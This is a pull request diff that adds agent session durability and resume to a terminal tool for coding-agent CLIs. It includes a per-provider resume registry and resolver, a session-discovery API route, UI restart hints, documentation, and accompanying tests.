### PR TITLE
feat(vault): agent session durability & resume (epic hgwo) [5/6]

### DIFF
--- a/docs/AGENTS.md
+++ b/docs/AGENTS.md
@@ -214,6 +214,49 @@ For the full design (Unix-socket push relay, internal endpoints, dedup), see the
 
 ---
 
+## 6. Session durability & resume (Vault)
+
+When an agent CLI process dies, the terminal server restarts, or the host/pod
+restarts, the agent's **conversation** is brought back via the provider's native
+resume mechanism — not just an empty tmux pane. The behavior is **declarative**:
+a single per-provider registry (`src/lib/agent-resume/agent-resume-registry.ts`)
+is the source of truth, consumed by the resume resolver
+(`src/infrastructure/agent-resume/AgentResumeResolverImpl.ts`) and wired into
+**every** launch path (create, HTTP `RestartAgentUseCase`, WS `restart_agent`,
+cold-attach recreate).
+
+### Resume capability matrix
+
+| Provider | Resumes? | Mechanism | Session-id source | Id capture |
+|----------|----------|-----------|-------------------|------------|
+| `claude` | ✅ | `claude --resume <id>` (flag) | `.jsonl` filename / header `sessionId` under `$CLAUDE_CONFIG_DIR/.claude/projects/<encodePath(cwd)>/` | Push (Stop hook → `/internal/agent-session-id`) **+** disk fallback |
+| `codex` | ✅ | `codex resume <id>` (**subcommand**, argv override) | newest rollout file under `$CODEX_HOME` (default `~/.codex/sessions`) | Disk discovery at relaunch |
+| `gemini` | ✅ | `gemini --resume <id>` (flag) | newest checkpoint under `$GEMINI_HOME` (default `~/.gemini/tmp`) | Disk discovery at relaunch |
+| `opencode` | ✅ | `opencode --session <id>` (flag) | newest session under `$OPENCODE_HOME` (default `~/.local/share/opencode`) | Disk discovery at relaunch |
+| `antigravity` | ❌ | — (no confirmed resume flag) | — | — — relaunches **fresh** (UI marks "Fresh (resume unsupported)") |
+
+Notes:
+
+- **Codex resume is a subcommand, not a flag** — the registry models this with a
+  `resume: { kind: "subcommand" }` template that produces a full argv override
+  (`["codex","resume","<id>"]`) rather than appended flags.
+- **Flag spelling is version-dependent** for gemini/opencode. `verifyResumeFlag()`
+  probes the installed CLI's `--help` at startup diagnostics and logs a `warn`
+  if the token is missing, so drift is detectable without changing the resolver
+  (adjust the registry only).
+- **Native id capture asymmetry:** Claude pushes its id in real time via the
+  Stop hook; the other providers have no hook system today and rely on **disk
+  discovery** (newest session file under the profile-isolated home dir) at
+  relaunch.
+- **Durable resume binding:** at create time a sanitized resume binding
+  (provider + flags + **secrets-stripped** env) is persisted into
+  `terminalSessions.typeMetadata.resumeBinding`. After a pod restart this env is
+  re-injected into the recreated tmux so the profile-isolated home dir that
+  holds the resume files is present. Secrets are never persisted; the agent
+  re-resolves API keys from its own profile credential store.
+
+---
+
 ## See also
 
 - [`RDV_CLI.md`](./RDV_CLI.md) — `rdv` CLI reference (agent + peer + session commands)

--- a/src/app/api/agent/sessions/route.test.ts
+++ b/src/app/api/agent/sessions/route.test.ts
@@ -1,0 +1,60 @@
+// @vitest-environment node
+import { describe, it, expect, vi, beforeEach } from "vitest";
+
+// Auth wrapper passes through with a fixed userId.
+vi.mock("@/lib/api", () => ({
+  withApiAuth:
+    (handler: (req: Request, ctx: { userId: string }) => unknown) =>
+    (req: Request) =>
+      handler(req, { userId: "u1" }),
+  errorResponse: (message: string, status: number, code: string) =>
+    new Response(JSON.stringify({ error: message, code }), { status }),
+}));
+
+const listSessionIds = vi.fn();
+vi.mock("@/lib/agent-resume/session-id-discovery", () => ({
+  listSessionIds: (...args: unknown[]) => listSessionIds(...args),
+}));
+
+vi.mock("@/services/agent-profile-service", () => ({
+  getProfile: vi.fn().mockResolvedValue({ configDir: "/profiles/p1" }),
+}));
+
+beforeEach(() => listSessionIds.mockReset());
+
+async function call(url: string) {
+  const { GET } = await import("./route");
+  return GET(new Request(url));
+}
+
+describe("GET /api/agent/sessions", () => {
+  it("returns the discovered listing for a valid provider", async () => {
+    listSessionIds.mockResolvedValue([
+      { sessionId: "cx-1", lastModified: "2026-06-03T00:00:00.000Z" },
+    ]);
+    const res = await call("http://localhost/api/agent/sessions?provider=codex&projectPath=/tmp/proj");
+    expect(res.status).toBe(200);
+    const body = await res.json();
+    expect(body.provider).toBe("codex");
+    expect(body.sessions[0].sessionId).toBe("cx-1");
+  });
+
+  it("rejects an invalid provider", async () => {
+    const res = await call("http://localhost/api/agent/sessions?provider=bogus&projectPath=/tmp/proj");
+    expect(res.status).toBe(400);
+    expect((await res.json()).code).toBe("INVALID_PROVIDER");
+  });
+
+  it("rejects antigravity (not resume-capable)", async () => {
+    const res = await call(
+      "http://localhost/api/agent/sessions?provider=antigravity&projectPath=/tmp/proj",
+    );
+    expect(res.status).toBe(400);
+  });
+
+  it("rejects a missing projectPath", async () => {
+    const res = await call("http://localhost/api/agent/sessions?provider=claude");
+    expect(res.status).toBe(400);
+    expect((await res.json()).code).toBe("INVALID_PROJECT_PATH");
+  });
+});

--- a/src/app/api/agent/sessions/route.ts
+++ b/src/app/api/agent/sessions/route.ts
@@ -1,0 +1,67 @@
+/**
+ * GET /api/agent/sessions
+ *
+ * [hgwo] Multi-provider resumable-session discovery. Generalizes the
+ * Claude-only `/api/agent/claude-sessions` route to every resume-capable
+ * provider (claude, codex, gemini, opencode) by delegating to the per-provider
+ * on-disk discovery (`session-id-discovery.ts`). Antigravity (no resume) and
+ * `none` return an empty list.
+ *
+ * Query params:
+ *   provider     - One of claude|codex|gemini|opencode (required)
+ *   projectPath  - Absolute path of the project directory (required)
+ *   profileId    - Agent profile ID for profile-isolated config (optional)
+ *   limit        - Max sessions to return (default: 20, max: 50)
+ */
+
+import { NextResponse } from "next/server";
+import { withApiAuth, errorResponse } from "@/lib/api";
+import { validateProjectPath } from "@/lib/api-validation";
+import { listSessionIds } from "@/lib/agent-resume/session-id-discovery";
+import { getResumeSpec } from "@/lib/agent-resume/agent-resume-registry";
+import * as AgentProfileService from "@/services/agent-profile-service";
+import type { AgentProviderType } from "@/types/session";
+
+const VALID_PROVIDERS: AgentProviderType[] = ["claude", "codex", "gemini", "opencode"];
+
+export const GET = withApiAuth(async (request, { userId }) => {
+  const { searchParams } = new URL(request.url);
+  const provider = searchParams.get("provider") as AgentProviderType | null;
+  const rawPath = searchParams.get("projectPath");
+  const profileId = searchParams.get("profileId");
+  const rawLimit = parseInt(searchParams.get("limit") ?? "20", 10);
+  const limit = Math.min(Math.max(1, rawLimit), 50);
+
+  if (!provider || !VALID_PROVIDERS.includes(provider)) {
+    return errorResponse(
+      `provider must be one of: ${VALID_PROVIDERS.join(", ")}`,
+      400,
+      "INVALID_PROVIDER",
+    );
+  }
+
+  const projectPath = validateProjectPath(rawPath ?? undefined);
+  if (!projectPath) {
+    return errorResponse("Valid absolute projectPath is required", 400, "INVALID_PROJECT_PATH");
+  }
+
+  // Resolve the profile-isolated env so discovery scans the right CLI home dir.
+  const env: Record<string, string> = {};
+  if (profileId) {
+    const profile = await AgentProfileService.getProfile(profileId, userId);
+    if (profile) {
+      const spec = getResumeSpec(provider);
+      if (spec.sessionIdSource.homeEnvVar && profile.configDir) {
+        // claude joins ".claude" itself; pass the bare config dir for it, and
+        // the provider home dir for the rest.
+        env[spec.sessionIdSource.homeEnvVar] = profile.configDir;
+      }
+      if (provider === "claude") {
+        env.CLAUDE_CONFIG_DIR = profile.configDir;
+      }
+    }
+  }
+
+  const sessions = await listSessionIds(provider, projectPath, env, limit);
+  return NextResponse.json({ provider, sessions });
+});

--- a/src/application/ports/AgentResumeResolver.ts
+++ b/src/application/ports/AgentResumeResolver.ts
@@ -1,0 +1,38 @@
+/**
+ * AgentResumeResolver — application-layer PORT for turning a stored/discovered
+ * native agent session id into a launch instruction that resumes the agent's
+ * conversation. The infra implementation (`AgentResumeResolverImpl`) reads the
+ * declarative per-provider registry; the application layer owns only this
+ * interface (Clean Architecture: domain → application → infrastructure).
+ */
+
+import type { Session } from "@/domain/entities/Session";
+import type { ResumeResolution } from "@/types/agent-resume";
+
+export interface AgentResumeResolver {
+  /**
+   * Resolve how to relaunch `session` so its conversation resumes.
+   *
+   * Returns `null` when the provider has no resume capability or no native id
+   * is known (caller then relaunches fresh).
+   *
+   * @param session the session to resume (carries provider, projectPath,
+   *   typeMetadata.agentSessionId / resumeBinding).
+   * @param env optional resolved (profile-isolated) env for on-disk discovery
+   *   of the newest native session id when none was captured to the DB.
+   */
+  resolveResume(
+    session: Session,
+    env?: Record<string, string>,
+  ): Promise<ResumeResolution | null>;
+}
+
+/**
+ * A no-op resolver that always relaunches fresh. Used as the safe default when
+ * no resolver is injected (preserves legacy fresh-relaunch behavior).
+ */
+export class NoopAgentResumeResolver implements AgentResumeResolver {
+  async resolveResume(): Promise<ResumeResolution | null> {
+    return null;
+  }
+}

--- a/src/application/use-cases/session/RestartAgentUseCase.ts
+++ b/src/application/use-cases/session/RestartAgentUseCase.ts
@@ -19,7 +19,13 @@
 import type { Session } from "@/domain/entities/Session";
 import type { SessionRepository } from "@/application/ports/SessionRepository";
 import type { TmuxGateway } from "@/application/ports/TmuxGateway";
+import {
+  type AgentResumeResolver,
+  NoopAgentResumeResolver,
+} from "@/application/ports/AgentResumeResolver";
 import { EntityNotFoundError, InvalidStateTransitionError } from "@/domain/errors/DomainError";
+import { AGENT_PROVIDERS } from "@/types/session";
+import { buildAgentCommand } from "@/lib/terminal-plugins/agent-utils";
 import { createLogger } from "@/lib/logger";
 
 const log = createLogger("RestartAgent");
@@ -32,6 +38,8 @@ export interface RestartAgentInput {
 export interface RestartAgentOutput {
   session: Session;
   wasRecreated: boolean;
+  /** [hgwo] true when the agent was relaunched with a resume flag/argv. */
+  resumed: boolean;
 }
 
 /**
@@ -52,28 +60,15 @@ export class RestartAgentError extends Error {
   }
 }
 
-/**
- * Get the agent CLI command based on provider.
- */
-function getAgentCommand(provider: string | null): string {
-  switch (provider) {
-    case "claude":
-      return "claude";
-    case "codex":
-      return "codex";
-    case "gemini":
-      return "gemini";
-    case "opencode":
-      return "opencode";
-    default:
-      return "claude"; // Default to Claude
-  }
-}
-
 export class RestartAgentUseCase {
   constructor(
     private readonly sessionRepository: SessionRepository,
-    private readonly tmuxGateway: TmuxGateway
+    private readonly tmuxGateway: TmuxGateway,
+    // [hgwo] Resume resolver turns the session's stored/discovered native id
+    // into resume flags so the conversation comes back, not a fresh agent.
+    // Optional + defaults to a no-op resolver so legacy 2-arg construction
+    // (and tests) keep the prior fresh-relaunch behavior.
+    private readonly resumeResolver: AgentResumeResolver = new NoopAgentResumeResolver()
   ) {}
 
   async execute(input: RestartAgentInput): Promise<RestartAgentOutput> {
@@ -140,9 +135,26 @@ export class RestartAgentUseCase {
     }
 
     // Tmux session exists - send the new agent command
-    // Environment persists at tmux session level, no re-injection needed
+    // Environment persists at tmux session level, no re-injection needed.
+    // [hgwo] Resolve resume flags so the agent's CONVERSATION comes back
+    // (was: bare command with no flags). Falls back to a fresh relaunch when
+    // the provider has no resume support or no native id is known.
+    let resumed = false;
     try {
-      const agentCommand = getAgentCommand(session.agentProvider);
+      const provider =
+        AGENT_PROVIDERS.find((p) => p.id === (session.agentProvider ?? "claude")) ??
+        AGENT_PROVIDERS.find((p) => p.id === "claude")!;
+      const resolution = await this.resumeResolver.resolveResume(session);
+      resumed = Boolean(resolution);
+      const agentCommand = resolution?.argvOverride
+        ? resolution.argvOverride.join(" ") // e.g. "codex resume <id>"
+        : buildAgentCommand(provider, resolution?.resumeFlags ?? [], false);
+      log.info("Relaunching agent (HTTP restart)", {
+        sessionId: input.sessionId,
+        provider: provider.id,
+        resumed,
+      });
+      // sendKeys submits with Enter (carriage return) — Claude TUI needs \r.
       await this.tmuxGateway.sendKeys(tmuxName, agentCommand);
     } catch (error) {
       // Revert session to exited state on failure to avoid stuck "restarting" state
@@ -167,6 +179,7 @@ export class RestartAgentUseCase {
     return {
       session: savedSession,
       wasRecreated: false,
+      resumed,
     };
   }
 }

--- a/src/application/use-cases/session/__tests__/RestartAgentUseCase.resume.test.ts
+++ b/src/application/use-cases/session/__tests__/RestartAgentUseCase.resume.test.ts
@@ -1,0 +1,111 @@
+// @vitest-environment node
+import { describe, it, expect, vi, beforeEach, type Mock } from "vitest";
+import { RestartAgentUseCase } from "../RestartAgentUseCase";
+import type { SessionRepository } from "@/application/ports/SessionRepository";
+import type { TmuxGateway } from "@/application/ports/TmuxGateway";
+import type { AgentResumeResolver } from "@/application/ports/AgentResumeResolver";
+import { Session } from "@/domain/entities/Session";
+
+describe("RestartAgentUseCase — resume", () => {
+  let repo: SessionRepository;
+  let tmux: TmuxGateway;
+  let resolver: AgentResumeResolver;
+
+  const agentSession = (provider = "claude") =>
+    Session.create({
+      id: "123e4567-e89b-12d3-a456-426614174000",
+      userId: "user-123",
+      name: "Agent",
+      projectPath: "/home/user/project",
+      terminalType: "agent",
+      agentProvider: provider as "claude",
+    }).markAgentExited(0);
+
+  beforeEach(() => {
+    vi.resetAllMocks();
+    repo = {
+      findById: vi.fn(),
+      findByUser: vi.fn(),
+      count: vi.fn(),
+      findByIds: vi.fn(),
+      findByProject: vi.fn(),
+      save: vi.fn().mockImplementation((s: Session) => Promise.resolve(s)),
+      saveMany: vi.fn(),
+      delete: vi.fn(),
+      deleteMany: vi.fn(),
+      updateTabOrders: vi.fn(),
+      exists: vi.fn(),
+      getNextTabOrder: vi.fn(),
+      getAllActiveTmuxSessionNames: vi.fn(),
+    } as unknown as SessionRepository;
+    tmux = {
+      sessionExists: vi.fn().mockResolvedValue(true),
+      sendKeys: vi.fn().mockResolvedValue(undefined),
+    } as unknown as TmuxGateway;
+    resolver = { resolveResume: vi.fn() };
+  });
+
+  it("sends a resumed command when the resolver returns flags", async () => {
+    (repo.findById as Mock).mockResolvedValue(agentSession());
+    (resolver.resolveResume as Mock).mockResolvedValue({
+      provider: "claude",
+      nativeSessionId: "id1",
+      resumeFlags: ["--resume", "id1"],
+      argvOverride: null,
+    });
+    const useCase = new RestartAgentUseCase(repo, tmux, resolver);
+
+    const out = await useCase.execute({
+      sessionId: "123e4567-e89b-12d3-a456-426614174000",
+      userId: "user-123",
+    });
+
+    expect(tmux.sendKeys).toHaveBeenCalledWith(expect.any(String), "claude --resume id1");
+    expect(out.resumed).toBe(true);
+  });
+
+  it("sends a codex subcommand argv when the resolver returns an argvOverride", async () => {
+    (repo.findById as Mock).mockResolvedValue(agentSession("codex"));
+    (resolver.resolveResume as Mock).mockResolvedValue({
+      provider: "codex",
+      nativeSessionId: "cx",
+      resumeFlags: [],
+      argvOverride: ["codex", "resume", "cx"],
+    });
+    const useCase = new RestartAgentUseCase(repo, tmux, resolver);
+
+    await useCase.execute({
+      sessionId: "123e4567-e89b-12d3-a456-426614174000",
+      userId: "user-123",
+    });
+
+    expect(tmux.sendKeys).toHaveBeenCalledWith(expect.any(String), "codex resume cx");
+  });
+
+  it("relaunches fresh (bare command) when the resolver returns null", async () => {
+    (repo.findById as Mock).mockResolvedValue(agentSession());
+    (resolver.resolveResume as Mock).mockResolvedValue(null);
+    const useCase = new RestartAgentUseCase(repo, tmux, resolver);
+
+    const out = await useCase.execute({
+      sessionId: "123e4567-e89b-12d3-a456-426614174000",
+      userId: "user-123",
+    });
+
+    expect(tmux.sendKeys).toHaveBeenCalledWith(expect.any(String), "claude");
+    expect(out.resumed).toBe(false);
+  });
+
+  it("defaults to a no-op resolver (fresh) when none is injected", async () => {
+    (repo.findById as Mock).mockResolvedValue(agentSession());
+    const useCase = new RestartAgentUseCase(repo, tmux); // 2-arg legacy construction
+
+    const out = await useCase.execute({
+      sessionId: "123e4567-e89b-12d3-a456-426614174000",
+      userId: "user-123",
+    });
+
+    expect(tmux.sendKeys).toHaveBeenCalledWith(expect.any(String), "claude");
+    expect(out.resumed).toBe(false);
+  });
+});

--- a/src/components/session/SessionManager.tsx
+++ b/src/components/session/SessionManager.tsx
@@ -387,14 +387,28 @@ export function SessionManager({ isGitHubConnected = false }: SessionManagerProp
 
   // Handle server-pushed session rename (from `rdv session title`)
   const handleSessionRenamed = useCallback(
-    (sid: string, name: string, claudeSessionId?: string) => {
+    // [hgwo] `agentSessionId` is the generic per-provider native-id map carried
+    // by the enriched session_renamed broadcast. Back-compat: the legacy
+    // `claudeSessionId` string (from older servers) is wrapped as { claude }.
+    (
+      sid: string,
+      name: string,
+      claudeSessionId?: string,
+      agentSessionId?: Record<string, string>,
+    ) => {
       // Local-only update — the DB write already happened server-side.
       // Do NOT call updateSession() here: that sends a PATCH which sets
       // titleLocked=true, permanently preventing future title updates.
       const updates: Partial<TerminalSession> = { name };
-      if (claudeSessionId) {
+      const idMap = agentSessionId ?? (claudeSessionId ? { claude: claudeSessionId } : undefined);
+      if (idMap) {
         const existing = sessionsRef.current.find((s) => s.id === sid);
-        updates.typeMetadata = { ...existing?.typeMetadata, claudeSessionId };
+        const existingMap =
+          (existing?.typeMetadata?.agentSessionId as Record<string, string> | undefined) ?? {};
+        updates.typeMetadata = {
+          ...existing?.typeMetadata,
+          agentSessionId: { ...existingMap, ...idMap },
+        };
       }
       patchSessionLocal(sid, updates);
     },

--- a/src/components/terminal/AgentExitScreen.resume-indicator.test.tsx
+++ b/src/components/terminal/AgentExitScreen.resume-indicator.test.tsx
@@ -1,0 +1,39 @@
+import { render, screen } from "@testing-library/react";
+import { describe, expect, it, vi } from "vitest";
+import { AgentExitScreen } from "./AgentExitScreen";
+
+/**
+ * [hgwo] The exit screen hints whether a Restart will resume the conversation,
+ * based on the provider's resume capability.
+ */
+describe("AgentExitScreen — resume capability hint", () => {
+  const base = {
+    sessionId: "s1",
+    sessionName: "agent",
+    exitCode: 0,
+    exitedAt: new Date().toISOString(),
+    restartCount: 0,
+    onRestart: vi.fn(),
+    onClose: vi.fn(),
+  };
+
+  it("shows the resume hint for a resume-capable provider (claude)", () => {
+    render(<AgentExitScreen {...base} agentProvider="claude" />);
+    expect(screen.getByText(/resumes the prior conversation/i)).toBeTruthy();
+  });
+
+  it("shows the resume hint for codex", () => {
+    render(<AgentExitScreen {...base} agentProvider="codex" />);
+    expect(screen.getByText(/resumes the prior conversation/i)).toBeTruthy();
+  });
+
+  it("shows an unsupported hint for antigravity (no resume)", () => {
+    render(<AgentExitScreen {...base} agentProvider="antigravity" />);
+    expect(screen.getByText(/does not support resume/i)).toBeTruthy();
+  });
+
+  it("defaults to the resume hint when provider is unknown/null", () => {
+    render(<AgentExitScreen {...base} agentProvider={null} />);
+    expect(screen.getByText(/resumes the prior conversation/i)).toBeTruthy();
+  });
+});

--- a/src/components/terminal/AgentExitScreen.tsx
+++ b/src/components/terminal/AgentExitScreen.tsx
@@ -11,6 +11,7 @@
 import { RefreshCw, X, Terminal, Clock, AlertCircle, CheckCircle } from "lucide-react";
 import { Button } from "@/components/ui/button";
 import { cn } from "@/lib/utils";
+import type { AgentProviderType } from "@/types/session";
 
 interface AgentExitScreenProps {
   sessionId: string;
@@ -21,7 +22,14 @@ interface AgentExitScreenProps {
   onRestart: () => void;
   onClose: () => void;
   isRestarting?: boolean;
+  /** [hgwo] Provider, used to hint whether Restart resumes the conversation. */
+  agentProvider?: AgentProviderType | null;
 }
+
+// [hgwo] Client-safe resume-capability set (mirrors agent-resume-registry's
+// supportsResume; inlined to avoid pulling the server-only registry — which
+// imports node:child_process — into the client bundle).
+const RESUME_CAPABLE = new Set<AgentProviderType>(["claude", "codex", "gemini", "opencode"]);
 
 export function AgentExitScreen({
   sessionName,
@@ -31,7 +39,9 @@ export function AgentExitScreen({
   onRestart,
   onClose,
   isRestarting = false,
+  agentProvider,
 }: AgentExitScreenProps) {
+  const canResume = agentProvider ? RESUME_CAPABLE.has(agentProvider) : true;
   const exitedTime = new Date(exitedAt);
   const formattedTime = exitedTime.toLocaleTimeString();
   const isSuccess = exitCode === 0;
@@ -133,7 +143,9 @@ export function AgentExitScreen({
 
         {/* Help Text */}
         <p className="text-xs text-muted-foreground mt-4 text-center">
-          Restarting will create a new agent session in the same directory.
+          {canResume
+            ? "Restarting resumes the prior conversation when a session id is found, otherwise it starts fresh."
+            : "This provider does not support resume — restarting starts a fresh session."}
         </p>
       </div>
     </div>

--- a/src/components/terminal/Terminal.tsx
+++ b/src/components/terminal/Terminal.tsx
@@ -132,15 +132,22 @@ interface TerminalProps {
   onSessionExit?: (exitCode: number) => void;
   /** Called when an agent session exits (only for terminalType='agent') */
   onAgentExited?: (exitCode: number | null, exitedAt: string) => void;
-  /** Called when an agent session restarts successfully */
-  onAgentRestarted?: () => void;
+  /** Called when an agent session restarts successfully. [hgwo] `resumed`
+   *  distinguishes a resumed conversation from a fresh relaunch. */
+  onAgentRestarted?: (resumed?: boolean) => void;
   /** Called when agent activity status changes (from Claude Code hooks).
    *  Includes sessionId so broadcast messages correctly target the right session. */
   onAgentActivityStatus?: (sessionId: string, status: string) => void;
   /** Called when beads issues are updated */
   onBeadsIssuesUpdated?: (sessionId: string) => void;
-  /** Called when an agent session is auto-titled from its .jsonl file */
-  onSessionRenamed?: (sessionId: string, name: string, claudeSessionId?: string) => void;
+  /** Called when an agent session is auto-titled from its .jsonl file.
+   *  [hgwo] `agentSessionId` is the generic per-provider native-id map. */
+  onSessionRenamed?: (
+    sessionId: string,
+    name: string,
+    claudeSessionId?: string,
+    agentSessionId?: Record<string, string>,
+  ) => void;
   /** Called when a notification is broadcast from the terminal server */
   onNotification?: (notification: Record<string, unknown>) => void;
   /** Called when a session status indicator is set or cleared */
@@ -865,13 +872,19 @@ export const Terminal = forwardRef<TerminalRef, TerminalProps>(function Terminal
               case "agent_restarted":
                 // Agent has been restarted successfully
                 terminal.clear();
-                terminal.writeln("\x1b[32mAgent restarted\x1b[0m\r\n");
+                // [hgwo] Show resumed-vs-fresh so the user knows whether the
+                // conversation was restored.
+                terminal.writeln(
+                  msg.resumed
+                    ? "\x1b[32mAgent resumed (conversation restored)\x1b[0m\r\n"
+                    : "\x1b[33mAgent restarted (fresh session)\x1b[0m\r\n"
+                );
                 // Clear intentional exit flag
                 intentionalExitRef.current = false;
                 // Reset activity status to running
                 onAgentActivityStatusRef.current?.(sessionId, "running");
                 // Notify parent component
-                onAgentRestartedRef.current?.();
+                onAgentRestartedRef.current?.(Boolean(msg.resumed));
                 break;
               case "agent_activity_status":
                 // Agent activity status from Claude Code hooks (broadcast — may be for any session)
@@ -883,7 +896,12 @@ export const Terminal = forwardRef<TerminalRef, TerminalProps>(function Terminal
                 break;
               case "session_renamed":
                 // Agent session auto-titled from .jsonl first user message
-                onSessionRenamedRef.current?.(msg.sessionId, msg.name, msg.claudeSessionId);
+                onSessionRenamedRef.current?.(
+                  msg.sessionId,
+                  msg.name,
+                  msg.claudeSessionId,
+                  msg.agentSessionId as Record<string, string> | undefined,
+                );
                 break;
               case "notification":
                 // In-app notification broadcast from terminal server

--- a/src/db/__tests__/schema-column-diff.test.ts
+++ b/src/db/__tests__/schema-column-diff.test.ts
@@ -61,7 +61,7 @@ describe("schema column diff (sqlite-core vs pg-core)", () => {
     // model_proxy_token, model_usage_event) + 6 (oyej: agentSchedules,
     // agentRuns, triggerConfigs, triggerEvents, crownRuns, crownCandidates)
     // + 4 (x386: message_delivery, message_replay_cursor, channel_subscription,
-    // agent_work_context) = 74 tables.
+    // agent_work_context) = 74 tables. (hgwo adds no tables.)
     expect(sqliteTables).toHaveLength(74);
   });
 

--- a/src/hooks/useTerminalWebSocket.ts
+++ b/src/hooks/useTerminalWebSocket.ts
@@ -27,10 +27,17 @@ export interface UseTerminalWebSocketOptions {
   onWebSocketReady?: (ws: WebSocket | null) => void;
   onSessionExit?: (exitCode: number) => void;
   onAgentExited?: (exitCode: number | null, exitedAt: string) => void;
-  onAgentRestarted?: () => void;
+  // [hgwo] `resumed` distinguishes a resumed conversation from a fresh relaunch.
+  onAgentRestarted?: (resumed?: boolean) => void;
   onAgentActivityStatus?: (sessionId: string, status: string) => void;
   onBeadsIssuesUpdated?: (sessionId: string) => void;
-  onSessionRenamed?: (sessionId: string, name: string, claudeSessionId?: string) => void;
+  // [hgwo] `agentSessionId` is the generic per-provider native-id map.
+  onSessionRenamed?: (
+    sessionId: string,
+    name: string,
+    claudeSessionId?: string,
+    agentSessionId?: Record<string, string>,
+  ) => void;
   onNotification?: (notification: Record<string, unknown>) => void;
   onSessionStatus?: (sessionId: string, key: string, indicator: SessionStatusIndicator | null) => void;
   onSessionProgress?: (sessionId: string, progress: SessionProgress | null) => void;
@@ -281,8 +288,12 @@ export function useTerminalWebSocket({
             case "agent_restarted":
               intentionalExitRef.current = false;
               onAgentActivityStatusRef.current?.(sessionId, "running");
-              onStatusMessageRef.current?.("\x1b[32mAgent restarted\x1b[0m");
-              onAgentRestartedRef.current?.();
+              onStatusMessageRef.current?.(
+                msg.resumed
+                  ? "\x1b[32mAgent resumed (conversation restored)\x1b[0m"
+                  : "\x1b[33mAgent restarted (fresh session)\x1b[0m"
+              );
+              onAgentRestartedRef.current?.(Boolean(msg.resumed));
               break;
 
             case "agent_activity_status":
@@ -294,7 +305,12 @@ export function useTerminalWebSocket({
               break;
 
             case "session_renamed":
-              onSessionRenamedRef.current?.(msg.sessionId, msg.name, msg.claudeSessionId);
+              onSessionRenamedRef.current?.(
+                msg.sessionId,
+                msg.name,
+                msg.claudeSessionId,
+                msg.agentSessionId as Record<string, string> | undefined,
+              );
               break;
 
             case "notification":

--- a/src/infrastructure/agent-resume/AgentResumeResolverImpl.ts
+++ b/src/infrastructure/agent-resume/AgentResumeResolverImpl.ts
@@ -1,0 +1,73 @@
+/**
+ * AgentResumeResolverImpl — infra implementation of the AgentResumeResolver
+ * port. Turns a session's provider + native id (stored in typeMetadata, or
+ * discovered on disk) into a resume launch instruction using the declarative
+ * resume registry. No inline provider `switch` — the registry is the single
+ * source of truth.
+ */
+
+import type { AgentResumeResolver } from "@/application/ports/AgentResumeResolver";
+import type { Session } from "@/domain/entities/Session";
+import type { ResumeResolution, AgentSessionIdMap } from "@/types/agent-resume";
+import type { AgentProviderType } from "@/types/session";
+import { AGENT_PROVIDERS } from "@/types/session";
+import { getResumeSpec } from "@/lib/agent-resume/agent-resume-registry";
+import { discoverLatestSessionId } from "@/lib/agent-resume/session-id-discovery";
+import { createLogger } from "@/lib/logger";
+
+const log = createLogger("AgentResume");
+
+/** Resolve a provider's launch command from the single AGENT_PROVIDERS source. */
+function providerCommand(p: AgentProviderType): string {
+  return AGENT_PROVIDERS.find((x) => x.id === p)?.command ?? p;
+}
+
+export class AgentResumeResolverImpl implements AgentResumeResolver {
+  async resolveResume(
+    session: Session,
+    env: Record<string, string> = {},
+  ): Promise<ResumeResolution | null> {
+    const provider = (session.agentProvider ?? "none") as AgentProviderType;
+    const spec = getResumeSpec(provider);
+    if (!spec.supportsResume) {
+      log.debug("Provider has no resume capability; will relaunch fresh", { provider });
+      return null;
+    }
+
+    // 1) Prefer the durably stored native id (hgwo.1 capture).
+    const stored = (session.typeMetadata?.agentSessionId as AgentSessionIdMap | undefined)?.[
+      provider
+    ];
+    // 2) Fall back to the newest on-disk session for this cwd.
+    const cwd = session.projectPath ?? env.HOME ?? "";
+    const nativeSessionId =
+      stored ?? (cwd ? await discoverLatestSessionId(provider, cwd, env) : null);
+
+    if (!nativeSessionId) {
+      log.info("No resumable session id found; will relaunch fresh", {
+        provider,
+        sessionId: session.id,
+      });
+      return null;
+    }
+
+    if (spec.resume.kind === "subcommand") {
+      // e.g. `codex resume <id>` → full argv override
+      const command = providerCommand(provider);
+      return {
+        provider,
+        nativeSessionId,
+        resumeFlags: [],
+        argvOverride: [command, spec.resume.token!, nativeSessionId],
+      };
+    }
+
+    // flag kind: ["--resume", "<id>"] fed to buildAgentCommand
+    return {
+      provider,
+      nativeSessionId,
+      resumeFlags: [spec.resume.token!, nativeSessionId],
+      argvOverride: null,
+    };
+  }
+}

--- a/src/infrastructure/agent-resume/__tests__/AgentResumeResolverImpl.test.ts
+++ b/src/infrastructure/agent-resume/__tests__/AgentResumeResolverImpl.test.ts
@@ -1,0 +1,67 @@
+// @vitest-environment node
+import { describe, it, expect, vi } from "vitest";
+
+vi.mock("@/lib/agent-resume/session-id-discovery", () => ({
+  discoverLatestSessionId: vi.fn().mockResolvedValue("disk-id"),
+}));
+
+import { AgentResumeResolverImpl } from "../AgentResumeResolverImpl";
+import type { Session } from "@/domain/entities/Session";
+
+// Minimal Session stub exposing only the getters the resolver reads.
+const sess = (over: {
+  agentProvider?: string;
+  typeMetadata?: Record<string, unknown>;
+  projectPath?: string | null;
+}): Session =>
+  ({
+    id: "s1",
+    projectPath: over.projectPath ?? "/p",
+    typeMetadata: over.typeMetadata ?? {},
+    agentProvider: over.agentProvider ?? null,
+  }) as unknown as Session;
+
+describe("AgentResumeResolverImpl", () => {
+  const r = new AgentResumeResolverImpl();
+
+  it("uses the stored id for claude as --resume flags", async () => {
+    const res = await r.resolveResume(
+      sess({ agentProvider: "claude", typeMetadata: { agentSessionId: { claude: "stored-id" } } }),
+    );
+    expect(res).toEqual({
+      provider: "claude",
+      nativeSessionId: "stored-id",
+      resumeFlags: ["--resume", "stored-id"],
+      argvOverride: null,
+    });
+  });
+
+  it("uses a codex subcommand argv override", async () => {
+    const res = await r.resolveResume(
+      sess({ agentProvider: "codex", typeMetadata: { agentSessionId: { codex: "cx" } } }),
+    );
+    expect(res?.argvOverride).toEqual(["codex", "resume", "cx"]);
+    expect(res?.resumeFlags).toEqual([]);
+  });
+
+  it("uses --session for opencode", async () => {
+    const res = await r.resolveResume(
+      sess({ agentProvider: "opencode", typeMetadata: { agentSessionId: { opencode: "oc" } } }),
+    );
+    expect(res?.resumeFlags).toEqual(["--session", "oc"]);
+  });
+
+  it("returns null for antigravity (no resume support)", async () => {
+    expect(await r.resolveResume(sess({ agentProvider: "antigravity" }))).toBeNull();
+  });
+
+  it("returns null for a provider-less / none session", async () => {
+    expect(await r.resolveResume(sess({ agentProvider: "none" }))).toBeNull();
+  });
+
